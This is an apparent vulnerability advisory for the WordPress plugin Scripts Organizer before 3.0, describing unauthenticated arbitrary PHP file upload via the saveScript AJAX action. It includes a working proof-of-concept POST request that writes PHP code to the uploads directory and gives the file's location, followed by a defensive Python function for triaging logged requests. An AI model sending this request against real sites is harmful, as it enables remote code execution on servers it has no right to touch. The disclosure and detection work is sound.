wpexploit | Ovidiu Maghetiu | WPEX-ID:F3B450D2-84CE-4C13-AD6A-B60785DEE7E7
Sep 05, 2022 - 12:00 a.m.

Scripts Organizer < 3.0 - Unauthenticated Arbitrary File Upload


EPSS: 0.001 (percentile: 40.8%)

The plugin lacks capability and CSRF checks in the saveScript AJAX action, which is available to both unauthenticated and authenticated users, and does not validate user input in any way. This could allow unauthenticated users to write arbitrary PHP code to a file.

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 295

action=saveScript&php_script=%22%3C%3Fphp+die('test')%3B%22&SCORG_enable_script=1&form_data=post_status%3Dpublish%26post_name%3Dtest%26post_author%3D1%26post_name%3Dtest%26post_ID%3D200%26post_title%3Dtest%26SCORG_enable_script%3D1%26SCORG_trigger_location%3Deverywhere%26SCORG_script_type%3Dphp


The file will be at https://example.com/wp-content/uploads/scripts-organizer/200.php
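
For defenders, one way to triage captured requests (for example from a WAF or reverse-proxy body log) for this call, as an added example that is not part of the original advisory or the plugin's code. The function names and sample requests are constructed, and treating a `wordpress_logged_in_` cookie as a sign of an authenticated caller is a heuristic assumption; the returned `file_to_check` follows the `<post_ID>.php` location stated above.

```python
from urllib.parse import parse_qs, urlsplit

# Constructed sample: the advisory's request shape with a harmless script body.
SAMPLE_UNAUTH = (
    "POST /wp-admin/admin-ajax.php HTTP/1.1\r\n"
    "Host: example.com\r\n"
    "\r\n"
    "action=saveScript&php_script=placeholder&SCORG_enable_script=1"
    "&form_data=post_ID%3D200%26SCORG_script_type%3Dphp"
)
# Constructed sample: same call, but carrying a WordPress login cookie.
SAMPLE_AUTH = SAMPLE_UNAUTH.replace(
    "Host: example.com\r\n",
    "Host: example.com\r\nCookie: wordpress_logged_in_abc=constructed\r\n",
)

def first(params, key):
    """First value for key in a parse_qs result, or an empty string."""
    return params.get(key, [""])[0]

def triage_request(raw):
    """Return a finding for a saveScript AJAX call, or None if unrelated."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    parts = lines[0].split(" ")
    if len(parts) != 3 or parts[0] != "POST":
        return None
    url = urlsplit(parts[1])
    if not url.path.endswith("/wp-admin/admin-ajax.php"):
        return None
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    # WordPress reads "action" from $_REQUEST, so check query string and body.
    outer = {**parse_qs(url.query), **parse_qs(body, keep_blank_values=True)}
    if first(outer, "action") != "saveScript":
        return None
    # form_data is a second URL-encoded string nested inside the body.
    inner = parse_qs(first(outer, "form_data"), keep_blank_values=True)
    post_id = first(inner, "post_ID")
    # Cookie presence is a heuristic only; it does not prove a valid session.
    has_cookie = "wordpress_logged_in_" in headers.get("cookie", "")
    return {
        "unauthenticated": not has_cookie,
        "script_type": first(inner, "SCORG_script_type"),
        "file_to_check": (f"wp-content/uploads/scripts-organizer/{post_id}.php"
                          if post_id.isdigit() else None),
    }
```

On plugin versions before 3.0 a hit with `unauthenticated` set to false still deserves review, since the action also lacks capability checks.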
